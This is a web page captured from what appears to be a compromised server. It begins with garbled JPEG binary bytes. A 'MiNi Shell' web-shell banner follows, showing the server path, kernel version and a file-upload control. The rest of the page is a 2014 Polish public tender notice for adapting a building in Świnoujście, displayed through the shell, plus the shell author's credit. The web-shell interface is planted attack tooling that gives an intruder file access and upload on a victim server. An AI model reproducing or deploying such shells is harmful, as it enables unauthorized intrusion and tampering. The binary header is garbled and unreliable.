JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140403/73155-N-2014.html

<p class="kh_header"><b>Świnoujście: Adaptacja budynku położonego w Świnoujściu przy ul. Wyspiańskiego 35C 
na potrzeby administracji miejskiej</b><br>
<b>Numer ogłoszenia: 73155 - 2014; data zamieszczenia: 03.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej , ul. Monte Cassino 8, 72-600 Świnoujście, woj. zachodniopomorskie, tel. 91 3212280, 3212631 w. 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zgm.swinoujscie.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja budynku położonego w Świnoujściu przy ul. Wyspiańskiego 35C 
na potrzeby administracji miejskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na adaptacji budynku położonego 
w Świnoujściu przy ul. Wyspiańskiego 35C na potrzeby administracji miejskiej.

1. Zakres prac objętych zamówieniem obejmuje:
1) branża architektoniczna i budowlana, w tym:
- wyburzenia części ścian wewnętrznych oraz postawienie nowych ścianek działowych murowanych i G-K na stelażu metalowym,
- wzmocnienie elementów konstrukcyjnych w miejscach wyburzeń, a w piwnicy pod
  pomieszczeniami archiwum miejskiego wzmocnienie stropu konstrukcją stalową,
- wymiana elementów wykończenia (tynki, malowanie, płytki, okładziny PCW, podwieszane sufity)  w pomieszczeniach wskazanych w dokumentacji technicznej,
- ułożenie wykładzin podłogowych,
- malowanie pomieszczeń,
- wykonanie izolacji termicznej i akustycznej  w pomieszczeniach wskazanych 
w dokumentacji technicznej,
- wymiana stolarki drzwiowej i okiennej w pomieszczeniach wskazanych w dokumentacji technicznej,
- wykonanie otworów drzwiowych w ścianie nośnej,
- wykonanie nadproży konstrukcyjnych,
- poszerzenie części otworów drzwiowych w ścianach nośnych,
- wykonanie nowej konstrukcji stropu,
- wzmocnienie konstrukcji stropu;
- wykonanie szachtów dla sieci teletechnicznej umożliwiające jej  rozbudowywanie bez konieczności demontażu  kanałów i szachów;

2) branża sanitarna, w tym: 
- wymiana wewnętrznej instalacji wodnokanalizacyjnej,
-  montaż nowej instalacji zimnej wody,
-  montaż nowej instalacji ciepłej wody użytkowej,
-  montaż nowej instalacji cyrkulacji dla pomieszczeń sanitarnych i socjalnych,
- modernizacja instalacji c.o. wynikająca z nowego podziału pomieszczeń,
- wymiana  i montaż wskazanych grzejników c.o.,
- wymiana instalacji wewnętrznej hydrantowej,
- montaż instalacji wentylacji grawitacyjnej,
- montaż instalacji wentylacji  mechanicznej nawiewano - wywiewnej,
- modernizacja kotłowni,
- zmiana lokalizacji centrali wentylacyjnej nr 5 do  pomieszczenia nr 1.07; 

3) branża elektryczna, w tym:
- wymiana instalacji elektrycznej wewnętrznej,
- wymiana instalacji oświetlenia awaryjnego i ewakuacyjnego,
- instalacja sygnalizacyjnej p.poż. w pomieszczeniach archiwum miejskiego,
- położenie przewodu światłowodowego z budynku adaptowanego do budynku UM Świnoujście,  
- wymiana instalacji telefonicznej,
- montaż instalacji teletechnicznych, SAP, LAN,
- montaż instalacji niskoprądowych;

4) pozostałe prace, nie ujęte w dokumentacji na adaptację budynku położonego 
w Świnoujściu przy ul. Wyspiańskiego 35C na potrzeby administracji miejskiej:
a)	montaż instalacji domofonowej:
           - manipulator o jakości, standardzie i parametrach technicznych nie gorszych niż 
              manipulator firmy Laskomex (pulpit) - 4 szt.,
           - urządzenia odbierające sygnał (słuchawki/ aparaty domofonowe) - 20 szt.,
           - akumulator podtrzymujący napięcie w przypadku braku prądu w instalacji 
             domofonowej przez co najmniej 12 godzin,
           - montaż elektrozaczepu w drzwiach klatkowych - 4 szt., 
           - dorobienie kluczy dla użytkowników wraz z dostępem za pomocą chipów - 20 szt., 
           - montaż przewodów instalacji domofonowej w bruzdach  w ilości około 600mb,
           - wykonanie prób i sprawdzeń wraz z przedstawieniem odpowiednich protokołów oraz 
             dokumentów potwierdzających wbudowane materiały,
b)	uzupełnienie barierki na klatce schodowej o stalowe tralki - 18 sztuk, montaż przez wspawanie płaskownika o długości 3mb wraz z odmalowaniem,
c)	wymiana mieszacza wraz z napędem na instalacji c.o w kotłowni gazowej (mieszacz
/o jakości, standardzie i parametrach technicznych nie gorszych niż zawór trójdrożny VR6131/ oraz siłownik ARA661) - 1 kpl.,
d)	wymiana pompy c.o. z podłączeniem instalacji zasilającej i sterującej z kotła c.o na 
      pompę o jakości, standardzie i parametrach technicznych nie gorszych od pompy 
      WILLO STRATOS VTCO 40/1-12 - 1 szt.,
e)	wstawienie dodatkowego punktu grzewczego w pom. nr 2.08   wraz z wykonaniem odpowiedniej instalacji przyłączeniowej od pionu instalacji c.o. oraz odtworzeniem zabudów mogących ulec uszkodzeniu w trakcie realizacji prac na powierzchni około 1m2: 
- montaż grzejnika C11 400 x 600 z zasileniem bocznym - 1szt.,
- długość instalacji przyłączeniowej w technologii Cu łączonej na lut miękki 
- około 5 mb,
- montaż zaworu termostatycznego z głowicą - 1 szt.,
f)	wykonanie folii antywłamaniowej w istniejących oknach budynku od strony wewnętrznej w klasie P2:
- piwnica - 28 sztuk (łącznie 25 m2),
- przyziemie - 16 sztuk (łącznie 39 m2),
g)	montaż czujników p.poż w pomieszczeniach: archiwum ZGM, serwerowni UM Świnoujście, serwerowni ZGM, na klatce schodowej od ul. Wyspiańskiego oraz 
w pomieszczeniach  wyposażonych w kontrolę dostępu (ilość czujek  - 10 szt., długość instalacji - około 200 mb, centralka - 1 szt., akumulator podtrzymujący napięcie 
- 1 szt.),
h)	odseparowanie sieci LAN ZGM od sieci LAN UM poprzez wyprowadzenie okablowania z serwerowni UM Świnoujście i doprowadzenie do serwerowni ZGM ,
i)	okablowanie sieci LAN oraz instalacji domofonowej (okablowanie należy opisać 
w sposób trwały na końcach przewodów),
j)	wykonanie instalacji pod telewizję kablową do pomieszczenia sali szkoleniowej  ZGM, gabinetów dyrekcji ZGM oraz pokoju informatyka - ilość okablowania około 200 mb,
k)	doprowadzenie sygnału internetowego od pomieszczenia serwerowni UM Świnoujście do pomieszczenia serwerowni ZGM - ilość okablowania około 200 mb,
l)	instalacja klimatyzatora w pomieszczeniu serwerowni ZGM (klimatyzator do przeniesienia z obecnej siedziby ZGM wraz z doprowadzeniem instalacji elektrycznej chłodniczej i grzewczej - 1kpl.),
m)	montaż szafy 19 40U wraz osprzętem (patchpanel 40 port x 2 listwa zasilająca 
1U - 2 szt.),
n)	montaż  panelu wentylacyjnego dachowego w szafie 19 40U  (termostat zamykający 
0 - 60oC) - 1kpl,
o)	podłączenie okablowania sieci LAN oraz instalacji telefonicznej do patchpanela 
w szafie 19 40U, 
p)	przygotowanie instalacji do połączenia projektora w sali multimedialnej ZGM oraz instalacji ekranu podwieszanego,

Obowiązkiem Wykonawcy będzie przedstawienie Zamawiającemu harmonogramu realizacji prac - w terminie do 7 dni od daty zawarcia umowy - według Załącznika Nr 1: Zakres prac i sposób przygotowania harmonogramu - Adaptacja budynku położonego w Świnoujściu przy ul. Wyspiańskiego 35C na potrzeby administracji miejskiej..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia dotychczasowemu Wykonawcy zamówień uzupełniających, nie objętych przedmiotem zamówienia podstawowego, nie przekraczających łącznie 50 % wartości realizowanego zamówienia, w przypadku wystąpienia okoliczności określonych w art. 67 ust. 1 pkt 6 ustawy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.40.00-5, 45.26.25.00-6, 45.42.00.00-7, 45.44.00.00-3, 45.45.30.00-7, 45.31.00.00-0, 45.21.33.16-1, 45.12.10.00-8, 45.33.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 40.000,00 zł (słownie: czterdzieści tysięcy złotych 00/100) przed upływem terminu składania ofert na warunkach określonych w art. 45 ustawy. Wadium może być wnoszone w formach wskazanych w art. 45 ust. 6 ustawy. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia wnoszone jest jedno wadium. 
2. Wadium wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy  ZGM-u w PEKAO SA Oddział w Świnoujściu  nr 63 1240 3914 1111 0000 3088 5813 z dopiskiem WADIUM-przetarg - adaptacja budynku położonego w Świnoujściu przy ul. Wyspiańskiego 35C na potrzeby administracji miejskiej .</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy, którzy posiadają doświadczenie zawodowe w wykonywaniu tego typu prac tzn. Wykonawcy, którzy wykażą, że w okresie ostatnich 5 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali należycie co najmniej dwa zamówienia odpowiadające swoim rodzajem i zakresem przedmiotowi zamówienia, tj. wykonali roboty remontowe lub adaptacyjne 
o wartości brutto min. 500 tys. zł każda; na potwierdzenie spełnienia tego warunku Wykonawca przedstawi wykaz wykonanych  robót z podaniem ich zakresu, wartości oraz daty i miejsca wykonania oraz dokument potwierdzający ich należyte wykonanie (zał. nr 3 do SIWZ);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy, którzy dysponują osobami posiadającymi odpowiadające specyfice prac uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej, sanitarnej oraz elektrycznej, a także  posiadającymi co najmniej 2-letnią praktykę zawodową w tego typu pracach (zał. nr 4 do SIWZ);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wykonawcy, którzy udzielą co najmniej:
- 36 - miesięcznej gwarancji na robociznę na wykonane prace remontowo - budowlane;
- gwarancji na materiały, wybudowane urządzenia, stolarkę okienną i drzwiową równoważnej z gwarancją producencką;
2) Wykonawcy, którzy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 300 tys. zł;
3) Wykonawcy, którzy wypełnili oraz podpisali formularz ofertowy (zał. nr 6 do SIWZ).
4) oświadczenie Wykonawcy - według zał. nr 2 do SIWZ,
5) wykaz prac oraz dokumenty potwierdzające ich należyte wykonanie na co najmniej dwie roboty remontowe lub adaptacyjne o wartości brutto min. 500  tys. zł każda wykonane w okresie ostatnich 5 lat przed wszczęciem niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie (wg zał. nr 3 do SIWZ),
6) wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia (wg zał.nr 4 do SIWZ),
7) oferta (Zamawiający zaleca sporządzenie oferty  według wzoru formularza oferty - zał. nr 6 do SIWZ),
8) upoważnienie osoby podpisującej ofertę (gdy nie wynika to z treści innych dokumentów załączonych do oferty),
9) lista podmiotów należących do tej samej grupy kapitałowej, albo informacja o tym, że Wykonawca nie należy do grupy kapitałowej (wg zał. nr 9 do SIWZ),</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zgm.swinoujscie.pl/ OGŁOSZENIA/PRZETARGI > Zamówienia Publiczne - przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ dostępna jest na stronie internetowej i w wersji papierowej ( odbiór osobisty) w Zakładzie Gospodarki Mieszkaniowej ul. Monte Cassino 8,pokój nr 30,bądź przesyłką za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2014 godzina 14:00, miejsce: Zakład Gospodarki Mieszkaniowej ul. Monte Cassino 8 - sekretariat, codziennie z wyjątkiem sobót, niedziel i dni wolnych od pracy w godzinach 7.30 do 15.30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com